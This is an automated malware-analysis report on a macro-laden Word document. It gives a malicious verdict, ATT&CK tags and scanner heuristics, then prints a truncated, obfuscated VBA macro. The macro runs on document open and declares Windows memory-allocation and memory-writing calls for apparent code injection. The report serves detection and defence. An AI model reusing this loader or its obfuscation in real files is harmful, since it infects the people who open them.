Verdict: MALICIOUS
Risk Score: 122
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The ClamAV heuristic also flags it as a downloader. While no direct download URLs are present, the presence of the macro and the downloader heuristic strongly suggest the intent to fetch and execute a secondary payload. The document body content is unrelated to the malicious functionality.
Heuristics (4)
- ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 40157 bytes | 1ed25a27deee0b7554a9bb6974168428e08ffa54cb6924b75647c16644da629b |
Preview script: first 1,000 lines of the extracted script (the preview concatenates two VBA modules, ThisDocument and jojojo, and is truncated by the analyzer).

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
spelt
wagnerian = 33 + 49
Pmt 0, wagnerian, 14859, 50071, 5
End Sub
Attribute VB_Name = "jojojo"
#If (18 - 100 + 482 + 74 - 2 + 228) > ((121 - 108 + 307) - (75 - 73 + 538) * 1) And Not ((70 - 16 - 26) - (6 - 90 + 112)) * 2 < (Win64) Then
Public Declare Function contingents _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (saintship As Any, ByVal abbess As Any, ByVal cantonal As Any, ByVal phonetic As Any, ByVal stain As Any, ByVal quiscalus As Any, ByVal multiform As Any) As Long
Public Declare Function paddlefish _
Lib "Ntdll " Alias _
"NtAllocateVirtualMemory" (irritation As Long, parse As Long, ByVal epiphany As Long, sulcatedByVal As Long, leucine As Long, ByVal oldtimer As Long) As Long
Public Declare Function valedictorian _
Lib "Ntdll " Alias _
"ZwWriteVirtualMemory" (ByVal archival As Any, ByVal aweinspiring As Any, ByVal autoimmune As Any, ByVal peacock As Any, ByVal seaworthiness As Any) As Long
#End If
Sub spelt()
Dim canicular As Long
Dim molar As Byte
fluctuation.quibbling.Value = Day(#12/5/2013#)
varday = twentieth = "convex"
anguill = coma
Set immaturely = fluctuation.quibbling.SelectedItem
bisectional = 24 + 57
Pmt 0, bisectional, 22211, 54117, 4
ah = immaturely.Name
befogged = 90 - 109 + 7863
modular = Right(ah, befogged)
hiker = fattish.centuple(modular)
harmonizable = 36 + 34
Pmt 0, harmonizable, 25423, 18192, 2
#If (112 - 106 + 394 + 101 - 82 + 281) > ((109 - 64 + 275) - (33 - 39 + 546) * 1) And ((44 - 122 + 106) - (64 - 1 - 35)) * 2 < (Win64) Then
Dim camelopard As Integer
Dim limb As LongPtr
Dim trisected As LongPtr
Dim gazania As LongPtr
Dim falsehearted As LongPtr
Dim gy As LongPtr
prickly = 119 - 59 + 2004
#End If
#If (86 - 117 + 431 + 65 - 7 + 242) > ((127 - 69 + 262) - (51 - 50 + 539) * 1) And Not ((8 - 10 + 30) - (19 - 128 + 137)) * 2 < (Win64) Then
Dim trisected As Long
Dim limb As Long
Dim gazania As Long
caeteris = 39 - 44 + 786
Dim falsehearted As Long
Dim gy As Long
prickly = caeteris + 3459
#End If
doodia = 117 - 116 - 1
inanity = 17 - 117 + 4196
ciconia = 55 + 24
Pmt 0, ciconia, 13184, 47415, 8
graciousness = garrisoned
peacemaker = 5 + 4
Pmt 0, peacemaker, 20710, 43446, 4
jacent = hiker
apple = apparentness
limb = camelidae(jacent)
Dim anseriformes As Integer
Dim boyishly As Byte
gazania = 95 - 3 - 92
trisected = limb + prickly
falsehearted = 28 - 55 + 201554
gy = 42 - 24 + 3482
angloamerican = contingents(falsehearted, _
gazania, trisected, _
gazania, gazania, _
gazania, _
gazania)
alcelaphus = 10 + 56
Pmt 0, alcelaphus, 9140, 53979, 5
End Sub
Function humani(da, supererogation, rifacimento)
Dim brachygraphy As Long
Dim wombat As Variant
Dim brachiate As Long
Dim towith As Long
Dim monodic As Long
Dim banter As Long
Dim imcompleteness As Long
Dim shamefacedness As Integer
Dim coequal As Long
Dim coadjutant As Integer
Dim auld As Integer
darkhaired = Rnd(416)
babble = babble
brachygraphy = da
coequal = rifacimento
darkhaired = Fix(128)
monodic = supererogation
controlling = 55 + 5
Pmt 0, controlling, 16883, 57370, 6
brachiate = 77 - 75 - 3
valedictorian ByVal brachiate, _
brachygraphy, _
monodic, coequal, _
imcompleteness
appositional = cuspidated - 82
End Function
Function camelidae(gluck)
Dim capon As String
Dim pleurodont As Variant
Dim cerous As Byte
Dim choloepus As Variant
#If (36 - 46 + 410 + 23 - 126 + 403) > ((1 - 63 + 382) - (54 - 87 + 573) * 1) And ((106 - 41 - 37) - (100 - 126 + 54)) * 2 < (Win64) Then
Dim mated As LongPtr
wrapper = 48 - 49 + 9
Dim ctenizidae As LongPtr
Dim spiritstirring As Long
Dim blain As LongPtr
Dim cavaliere As Long
factoid = VarPtr(mated)
blowtube = truffle(factoid, VarPtr(gluck) + (23 - 10 - 5), wrapper)
... (truncated)
```